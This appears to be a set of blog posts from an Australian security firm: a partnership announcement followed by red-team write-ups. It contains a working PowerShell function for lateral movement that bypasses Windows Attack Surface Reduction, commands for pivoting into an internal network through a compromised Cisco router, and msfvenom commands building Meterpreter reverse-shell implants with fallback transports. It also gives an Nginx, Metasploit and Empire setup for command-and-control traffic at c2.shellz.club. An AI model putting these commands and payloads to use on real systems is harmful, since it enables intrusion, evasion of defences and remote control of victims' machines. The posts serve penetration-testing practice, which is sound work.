
Ionize and Cogito Group Strategic Partnership

Ionize and Cogito Group today announced a strategic partnership that will enable both companies to significantly strengthen the breadth and depth of their cyber security capabilities.

 

Ionize and Cogito Group are both successful Australian cyber security companies with a global presence, with shared heritage as local Canberra start-ups. As Ionize and Cogito continue to broaden their portfolios, the partnership arrangement encourages both companies to collaborate, share resources, and support each other’s ventures.

 

The primary objective of the partnership is to work together to add value to each other’s business through the delivery of strategic projects. By sharing complementary services – with Ionize specialising in threat detection, adversary tactics and governance, risk & compliance, and Cogito Group specialising in authentication, cloud security, identity management and data protection – Ionize and Cogito Group will be able to offer a larger suite of services to customers, creating a greater capacity to meet customers’ expectations.

 


Lateral Movement in an Environment with Attack Surface Reduction

This blog post will discuss techniques to bypass the Attack Surface Reduction (ASR) rule “Block process creations originating from PSExec and WMI commands” which I came up against during a recent engagement.

 

The simplest solution to bypassing these restrictions could be to use a different lateral movement method such as Windows Remote Management (WinRM), Remote Desktop Protocol (RDP) or Distributed Component Object Model (DCOM) applications. Let’s assume these are all out of the question for the sake of the blog post.

 

The PSExec lateral movement method (also referred to as SMBExec) uses Remote Procedure Calls over SMB to call into the Service Control Manager and create a Windows Service for code or command execution. I tested PSExec with the ASR rule enabled using the Invoke-TheHash toolkit, and nothing prevented creating a Windows Service to create a process. I read online that the ASR rule only impacts the Sysinternals PsExec implementation, which further testing proved correct. So, the simplest bypass would be to use a custom implementation of the PsExec method such as Invoke-TheHash.
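
For context, a minimal Invoke-TheHash invocation looks something like the following sketch. The target, credentials and command are placeholders, and the parameter names are those used by the public Invoke-TheHash scripts.

# Hypothetical Invoke-TheHash usage (placeholder target, hash and command)
. .\Invoke-SMBExec.ps1
Invoke-SMBExec -Target 192.168.1.40 -Domain CORP -Username svc_admin -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "cmd.exe /c whoami > C:\Windows\Temp\out.txt" -Verbose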

 

Another bypass method would be to use the Windows Management Instrumentation (WMI) service. The WMI service will look up requests in a repository containing the class definitions to determine the responsible provider. The WMI providers contain the functionality and implement the classes and methods. The most common WMI lateral movement implementations leverage the Win32_Process::Create method within the Win32 Provider to launch a process on the target machine. This method is blocked when the ASR rule is enabled, and is often monitored by Endpoint Detection and Response (EDR) software.
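
For reference, the commonly blocked (and commonly detected) pattern is a single call along these lines; the computer name and command are placeholders:

# Classic WMI lateral movement via Win32_Process::Create - the call the ASR rule blocks
Invoke-WmiMethod -ComputerName TARGET01 -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami"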

 

This does not prevent an attacker from leveraging other providers, classes and methods for lateral movement. WMI contains powerful functionality with a diverse set of providers. The Win32_Service class exposes functionality to manage services on a target machine. I used this class to bypass the ASR rule and perform lateral movement with the PowerShell function below. The code leverages the Win32_Service class to create, start and delete a service on the target machine. The service is configured to spawn a command shell and run the specified command. This setup can be used to launch a Cobalt Strike, Empire, Covenant, etc. implant in an ASR-enabled environment.

WMI Service Lateral Move

function Invoke-WMIServiceLateralMove {
    Param (
        [Parameter(Mandatory)][String]$ComputerName,
        [Parameter(Mandatory)][String]$Command,
        [String]$ServiceName = "MemProtectSvc",
        [String]$ServiceDescription = "Memory Protection"
    )

    $Command = "%COMSPEC% /C " + $Command

    Write-Host ("Creating Service {0} on {1}" -f $ServiceName, $ComputerName)
    $ret = Invoke-WmiMethod -ComputerName $ComputerName -Class win32_service -name create -ArgumentList @($true,$ServiceDescription,2,$null,$null,$ServiceName,$Command,$null,16,'Automatic',$null,$null)
    # ArgumentList MUST be (DesktopInteract, DisplayName, ErrorControl, LoadOrderGroup, LoadOrderGroupDependencies, 
    # Name, PathName, ServiceDependencies, ServiceType, StartMode, StartName, StartPassword)
    if ($ret.ReturnValue -ne 0) {
        Write-Host ("Service Creation Failed! Output:")
        Write-Output $ret 
    }
    Write-Host ("Starting Service {0} on {1}" -f $ServiceName, $ComputerName)
    $service = Get-WmiObject -ComputerName $ComputerName -Class Win32_Service -Filter "Name='$ServiceName'"
    $ret = $service.startservice() # this will block because the executable is not a real service

    Write-Host ("Deleting Service {0} on {1}" -f $ServiceName, $ComputerName)
    $ret = $service.StopService()
    $ret = $service.Delete()
    if ($ret.ReturnValue -ne 0) {
        Write-Host ("Service Deletion Failed! Manual cleanup required for {0}" -f $ServiceName)
        Write-Output $ret 
    }
	Write-Host "Done"
}
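
Invocation is then a one-liner; the computer name and command here are placeholders:

Invoke-WMIServiceLateralMove -ComputerName TARGET01 -Command "powershell -nop -w hidden -enc <base64 payload>"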

I used Windows Services instead of directly accessing the registry because it allowed starting and stopping the service for instant lateral movement. Stealthier approaches exist, and the Win32_Registry class could be used to modify services, scheduled tasks, start-up entries, ASR rules, etc. These were the first things that came to mind when thinking about lateral movement with the methods available in the Win32_Registry class.

 

There are some creative methods blogged about online for lateral movement without the Win32_Process class. These include installing MSI packages, VBS scripts, class derivation and loading a custom provider.

 

The ASR rule should not be considered a security boundary and can be easily bypassed using creative approaches. I recommend disabling PSExec and WMI if they are not required within an environment, to make lateral movement more difficult. If PSExec and WMI are required, they should be monitored for unusual behavior as this could indicate malicious activity.


Cisco Pivoting for Penetration Testers

Updated: Jul 21, 2020

On a recent engagement we faced a difficult target with minimal external attack surface. Their website had a few flaws, but it was hosted externally with a third party. Even if we could compromise the site, it likely wouldn’t result in the internal network access we were searching for.

Thanks to Shodan, we identified a Cisco router which was externally-accessible. This is a rundown of how we leveraged this device into a full network compromise.

 

Disclaimer: This information would probably be nothing new for Cisco gurus or someone with a CCNA; but hopefully this post grants some security folk out there enough knowledge to turn a router compromise into internal shells in the future. As always, take extreme care when dealing with any critical network infrastructure.

 

The Router

 

Having identified a router which belonged to the target, we performed the typical enumeration we complete on every device: port scans, default password checks, SNMP checks, etc. Fortunately for us, the router had the read-only SNMP community string set to the default “public”, and the read-write community string set to the default “private”. With access to the read-write string, tools such as Metasploit’s scanner/snmp/cisco_config_tftp module can be used to pull down the running configuration, or more specifically, the hashes of the passwords in use on the device. The three-letter password was not particularly resilient to cracking, and in a short few minutes we were on the router with full permissions.
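
For anyone wanting to reproduce this step, the module usage is roughly as follows; the addresses are placeholders, and LHOST here is the attacker-controlled TFTP server that receives the configuration (check show options for your version of the module):

msf > use auxiliary/scanner/snmp/cisco_config_tftp
msf auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 100.200.100.200
msf auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY private
msf auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST <attacker external ip>
msf auxiliary(scanner/snmp/cisco_config_tftp) > run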

 

Great, we have access to the router – now what? We dug into the pivoting methods available to penetration testers when they encounter Cisco devices. Unfortunately for us, there was very limited information out there addressing the particular constraints we faced on this engagement.

 

The Network

 

What we had done so far looked similar to the above picture. We had compromised the router via its external interface (100.200.100.200) and had pulled down its configuration file. The internal LAN was reachable via one of the router’s interfaces, which had the address 192.168.1.3/24. There were further complications and interfaces, but they aren’t necessary details for the process we went through. One of our biggest hurdles was the configuration of the internal network. Clients were being assigned an IP address via an internal router located at 192.168.1.1. This was also their default gateway for any outbound traffic. The significance of this will come into play shortly.

 

Failed Attempts

 

The initial naive plan was to simply port-forward a connection from the external interface through to the internal LAN, resulting in quick-and-dirty access to specific services, allowing us to obtain shells before tearing down the now-obsolete port forward. This would be a simple command for the Cisco router to perform Static Network Address Translation (SNAT). We’ll get into actual commands in the successful attempts section, but this would essentially be saying to the Cisco device, “When you receive an incoming packet on 100.200.100.200:30000, always translate this to the IP address and port 192.168.1.40:3389 and forward it on via the internal interface.” With luck, the RDP service on 192.168.1.40 would respond, the packet would be forwarded back out via 192.168.1.3, we’d enter in some stolen credentials and success! Unfortunately for us this didn’t happen.
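
Concretely, the kind of static NAT port forward we had in mind would look roughly like the following on IOS. This is a sketch only (interface names are placeholders) and, as the next section explains, it is the approach that did not work for us:

// On the Cisco device (sketch; the port-forward idea that ultimately failed)
config term
interface <WAN Interface>
ip nat outside
interface <Internal LAN Interface>
ip nat inside
exit
ip nat inside source static tcp 192.168.1.40 3389 100.200.100.200 30000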

 

As you may have guessed from the earlier description, the problem was that the return packets were not in fact coming back via 192.168.1.3. Because the source address (50.50.50.50) was outside their subnet, the internal hosts were sending replies to their default gateway (192.168.1.1) to try to reach our IP! To this day I don’t know why the 192.168.1.1 device couldn’t route externally. As with most security work, curve balls like this create interesting problems that people don’t usually see. The correct solution to this routing issue would be “reconfigure the gateway to allow routing out to our IP address”, but as we don’t control that device it’s not an option. A pictorial version of our problem is represented below.

 

Okay, so at the router, we’re translating the destination address to be the internal LAN, but that leaves us with an “invalid” source address for the purposes of routing. We can’t change the router to do source address translation instead of destination address translation, because we’d then have no way of getting packets to the correct IP address (you can’t just set a route on your own computer saying the gateway for 192.168.1.0/24 is 100.200.100.200: the routers across the internet would not know how to honour your 192.168.1.40 destination IP). What we need is some form of double NAT: packets should exit the router with both the source and destination address translated. So, how to do double NAT on a Cisco 1841? The answer is not in the first 40 pages of Google results – trust me, I looked. It appears that this is possible on Cisco ASA devices, but not on a Cisco 1841. I attempted all manner of loopbacks, forwarding rules, NAT chains, etc. with no luck. I could not get the Cisco device to translate both source and destination IP addresses. If anyone knows how to do this on a Cisco 1841 I’d love to hear from you.

 

Our Savior – Generic Routing Encapsulation (GRE)

 

GRE is a protocol that wraps up other traffic and tunnels it through to a designated endpoint. Think of it as similar to a VPN in some ways. The key point is that this sorts out our “destination” address problem: we can now set the destination to an address in the target LAN (the 192.168.1.0/24 range) and let the tunnel “take care of the rest” in terms of getting the traffic to the target Cisco router. Anyway, enough theory, here are the commands. Here we set up a GRE tunnel with the subnet 172.16.0.0/24, assigning the Cisco device 172.16.0.1, and our device 172.16.0.3:

// On the attacking machine
modprobe ip_gre
iptunnel add mynet mode gre remote <target external ip> local <attacker external ip> ttl 255
ip addr add 172.16.0.3/24 dev mynet
ifconfig mynet up
route add -net 172.16.0.0 netmask 255.255.255.0 dev mynet

// On the Cisco device
config term
interface Tunnel0
ip address 172.16.0.1 255.255.255.0
ip mtu 1514
ip virtual-reassembly
tunnel source <Interface of WAN on the Cisco>
tunnel destination <Attacking Machine IP> 
 

After these commands are run on both devices, you should be able to ping 172.16.0.1 from your attacking machine, and ping 172.16.0.3 from the Cisco router. We have effectively created the following picture.

 

 

NAT – New and Improved

 

Now we’re not quite out of the woods yet. If we examine the traffic path we still have our return address problem (pictured below). The key successful step that we’ve taken however is that we’re no longer using up our “one” NAT rule on the Cisco 1841 to get our initial destination packet into a form that is workable for us. Revisiting our original port forwarding idea, we could continue to do ad hoc SNAT rules; but we’re not going to go through all this effort to address one port at a time. There has to be a better way.

 
 

Enter – Dynamic NAT. This is more commonly seen in your typical home setup, where you have multiple devices behind your router and you “NAT” your traffic out, presenting one public IP address to the internet at large. When you consider it that way, it’s almost exactly what we want to do in this situation, except the “internet at large” is actually our target LAN. If we can perform this type of NAT, as far as the target computers are concerned the traffic will be coming from 192.168.1.3, and they should return the traffic to that IP address. The NAT table on the Cisco router will remember what incoming traffic produced that specific IP / port source combination, and map it back to our 172.16.0.3 address appropriately. Again, this is the same thing done by your home router when receiving traffic back from the internet after you make a web request. Another key point: because the source address is translated to 192.168.1.3, it falls within the subnet of the target LAN. As a result, the hosts reply directly rather than via the 192.168.1.1 gateway which was giving us problems in the past!

Again, enough theory, what are the commands?

 
// On the Cisco Device
config term
interface Tunnel0
ip nat inside          
interface <Internal Lan Interface>
ip nat outside
exit
config term
access-list client-list permit ip 172.16.0.0 0.0.255.255         
ip nat enable       	 
ip nat source route-map test interface <Internal LAN Interface> overload
ip nat inside source list client-list interface <Internal LAN Interface> overload 
 

Success! With this configuration it is now possible to route traffic to the internal network from our attacking machine over a GRE tunnel. All of the 192.168.1.0/24 range is reachable from our attacking machine, and no special proxytunnels-like program is needed to access it. A final picture to show what the setup looks like. Hopefully this saves you the time it took me to figure it out!
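
One detail worth checking on the attacking machine: traffic for the target LAN also needs to be sent into the tunnel. Assuming the same tunnel set-up as above, something like:

// On the attacking machine
route add -net 192.168.1.0 netmask 255.255.255.0 gw 172.16.0.1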

 

Happy Hacking – Peleus


Multiple Transports in a Meterpreter Payload

Updated: Jul 21, 2020

It’s no secret that we’re big fans of the Metasploit Framework for red-team operations. Every now and again, we come across a unique problem and think “Wouldn’t it be great if Metasploit could do X?”

 

Often, after some investigation, it turns out that it is actually possible! But unfortunately, some of these great features haven’t had the attention they deserve. We hope this post will correct that for one feature that made our life much easier on a recent engagement.

 

Once Meterpreter shellcode has been run, whether from a phish or some other means, it will reach out to the attacker’s Command and Control (C2) server over some network transport, such as HTTP, HTTPS or TCP. However, in an unknown environment, a successful connection is not guaranteed: firewalls, proxies, or intrusion prevention systems might all prevent a certain transport method from reaching out to the public Internet.

Repeated trial and error is sometimes possible, but not always. For a phish, clicks come at a premium. Some exploits only give you one shot to get a shell, before crashing the host process. Wouldn’t it be great if you could send a Meterpreter payload with multiple fallback communication options? (Spoiler: you can, though it’s a bit fiddly)

 

Transports

 

Before we get there, let’s take a step back. Meterpreter has the ability to have multiple “transports” in a single implant. A transport is the method by which it communicates to the Metasploit C2 server: TCP, HTTP, etc. Typically, Meterpreter is deployed with a single transport, having had the payload type set in msfvenom or in a Metasploit exploit module (e.g. meterpreter_reverse_http).

But after a connection has been made between the implant and the C2 server, an operator can add additional, backup transports. This is particularly useful for redundancy: if one path goes down (e.g. your domain becomes blacklisted), it can fall back to another.

A transport is defined by its properties:

  • The type of transport (TCP, HTTP, etc.)

  • The host to connect to

  • The port to connect on

  • A URI, for HTTP-based transports

  • Other properties such as retry times and timeouts

Once a Meterpreter session has been set up, you can add a transport using the command transport add and providing it with parameters (type transport to see the options).
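
As a rough example (the host and port are placeholders; run transport on its own to see the full option list):

meterpreter > transport add -t reverse_https -l c2.example.com -p 8443
meterpreter > transport list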

 

Extension Initialisation Scripts

 

Meterpreter also has the concept of “extensions” which contain the vast majority of Meterpreter’s functionality. By default, the stdapi  extension (containing the most basic functionality of Meterpreter) is loaded during session initialisation. Other extensions, such as Kiwi (Mimikatz), PowerShell, or Incognito, can be added dynamically at runtime by using the load command.

 

When creating stageless payloads, msfvenom allows extensions to be pre-loaded; so rather than having to send them across the wire after session initialisation, they are already set up and ready to go. You can do this with the extensions parameter.

 

One neat feature which we think hasn’t gotten nearly enough attention is the ability to run a script inside the PowerShell and Python extensions, if they have been included in a stageless payload. The script, if included, is run after all of the extensions are loaded, but before the first communication attempt.

 

This provides the ability to add extra transports to the Meterpreter implant before it has even called back to the C2. This is made much easier by using the provided PowerShell bindings for this functionality; with the Add-TcpTransport and Add-WebTransport functions.

 

This is extremely useful in situations where the state of the target’s network is unknown: perhaps an HTTPS transport will work, or maybe it’ll be blocked, or the proxy situation will cause it to fail. Maybe TCP will work on port 3389. By setting up multiple transports in this initialisation script, Meterpreter will try each of them (for a configurable amount of time) before moving on to the next one.

 

To do this:

  • Create a stageless meterpreter payload, which pre-loads the PowerShell extension. The transport used on the command line will be the default

  • Include a PowerShell script as an “Extension Initialisation Script” (parameter name is extinit, and has the format of <extension name>,<absolute file path>). This script should add additional transports to the Meterpreter session.

  • When the shellcode runs, this script will also run

  • If the initial transport (the one specified on the command line) fails, Meterpreter will then try each of these alternative transports in turn

 

The command line for this would be:

msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe 

Then, in AddTransports.ps1 :

Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30
Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 30
 

Some gotchas to be aware of:

  • Make sure you include the full path to the extinit parameter (relative paths don’t appear to work)

  • Ensure you configure how long to try each transport before moving on to the next.

  • RetryWait is the time to wait between each attempt to contact the C2 server

  • RetryTotal is the total amount of time to wait before moving on to the next transport

  • Note that the parameter names for retry times and timeouts are different between the PowerShell bindings and the Metasploit parameters themselves: in the PowerShell extension, they are RetryWait and RetryTotal; in Metasploit they are SessionRetryWait and SessionRetryTotal (a tad confusing, as they relate to transports, not sessions)

 

Huge thanks to @TheColonial for implementing this feature, and for helping us figure out how to use it.


Configuring Metasploit and Empire to Catch Shells behind an Nginx Reverse Proxy

Updated: Jul 21, 2020

During red team engagements, we’ve found ourselves in the situation of wanting to use multiple remote access tools (Metasploit, Empire, Cobalt Strike, etc), all over port 443 for HTTPS communications. This is common when the only egress method from a network is HTTPS. This could be achieved with multiple hosts, each receiving a different type of shell; but what if you want or need to do this through a single domain or single host? This can be solved by using a reverse proxy to terminate the SSL connections and then proxy requests to each of the required tools based on a URI path. We’ve used Nginx for this purpose. The Nginx configuration below uses the location directive to pass all requests starting with /update to Metasploit (which will be listening on 127.0.0.1:2080), and the default Empire URIs to 127.0.0.1:1080. The connections are SSL-terminated by Nginx; and this is important to take into account when configuring the Metasploit and Empire handlers.

server {
	listen 80 default_server;
	listen [::]:80 default_server;

	listen 443 ssl default_server;
	listen [::]:443 ssl ipv6only=on default_server;
	
	root /var/www/html;
	index index.html;
	server_name c2.shellz.club;

	location / {
		# First attempt to serve request as file, then
		# as directory, then fall back to displaying a 404.
		try_files $uri $uri/ =404;
	}

	# Managed by Certbot
	ssl_certificate /etc/letsencrypt/live/c2.shellz.club/fullchain.pem; 
	ssl_certificate_key /etc/letsencrypt/live/c2.shellz.club/privkey.pem; 
	include /etc/letsencrypt/options-ssl-nginx.conf;
	ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem;

	# Metasploit
	location ~ ^/update(.*) {
		proxy_pass http://127.0.0.1:2080;
	}
	# Empire
	location ~ ^/(admin/get.php|news.php|login/process.php|download/more.php) {
		proxy_pass http://127.0.0.1:1080;
	}
}
 

Metasploit Handler Setup

 

I’ll demonstrate how to configure a Metasploit handler that accepts reverse HTTPS Meterpreter connections (staged or stageless) from any architecture or operating system. The multi/meterpreter/reverse_http module handles detection of architecture and OS, making our lives easier. When an initial connection is made to the handler (for staged payloads), the LHOST and LPORT parameters are used to tell the second stage where to connect. This means they should be the Nginx proxy and not the Metasploit listener. The requests will arrive with a URI of /update, and this needs to be reflected in the LURI parameter.

 
 

Our Metasploit handler needs to listen on 127.0.0.1:2080 as seen in the above Nginx configuration. We do this using the advanced configuration options (show advanced) ReverseListenerBindAddress and ReverseListenerBindPort. We have used a multi/meterpreter/reverse_http handler (not HTTPS) because Nginx handles SSL termination for us. We need to tell Metasploit that the implant will be using an HTTPS connection when connecting to Nginx; this is done by configuring the OverrideScheme parameter to HTTPS. Lastly, the OverrideRequestHost parameter must be true because otherwise “Metasploit uses the incoming request’s Host header value (if present) for the second stage configuration instead of the LHOST parameter.” (Thanks to @TheColonial for the tip on that.)
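
Putting that together, the handler configuration looks something like this (a sketch based on the options discussed above):

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD multi/meterpreter/reverse_http
msf exploit(multi/handler) > set LHOST c2.shellz.club
msf exploit(multi/handler) > set LPORT 443
msf exploit(multi/handler) > set LURI update
msf exploit(multi/handler) > set ReverseListenerBindAddress 127.0.0.1
msf exploit(multi/handler) > set ReverseListenerBindPort 2080
msf exploit(multi/handler) > set OverrideRequestHost true
msf exploit(multi/handler) > set OverrideScheme https
msf exploit(multi/handler) > set ExitOnSession false
msf exploit(multi/handler) > run -j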

 

 

Metasploit Payload Generation

 

Now we can generate Meterpreter HTTPS payloads (staged or stageless) for any OS or architecture. The payloads can be hosted on the same server over HTTPS using Nginx. The payloads require the LHOST and LPORT of the Nginx server, and the LURI used to route requests to Metasploit. The setup is flexible enough to catch other shells such as an Empire agent:

 
# Windows 64bit Stageless
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=c2.shellz.club LPORT=443 LURI=update -f exe > /var/www/html/meterp.exe
# Windows 32bit Staged
msfvenom -p windows/meterpreter/reverse_https LHOST=c2.shellz.club LPORT=443 LURI=update -f exe > /var/www/html/meterp_staged.exe  

 

Empire Setup

 

The Empire setup uses the http listener (uselistener http command). The Host parameter for staging should be the Nginx address (in this example, https://c2.shellz.club:443). The Empire listening address can then be configured using the BindIP and Port parameters which should match the IP address (127.0.0.1) and port (1080) in the Nginx configuration file. No further configuration is required.
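
In the Empire console the setup looks roughly like this (the listener name is arbitrary; option names as discussed above):

(Empire) > uselistener http
(Empire: listeners/http) > set Name nginx-http
(Empire: listeners/http) > set Host https://c2.shellz.club:443
(Empire: listeners/http) > set BindIP 127.0.0.1
(Empire: listeners/http) > set Port 1080
(Empire: listeners/http) > execute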

 
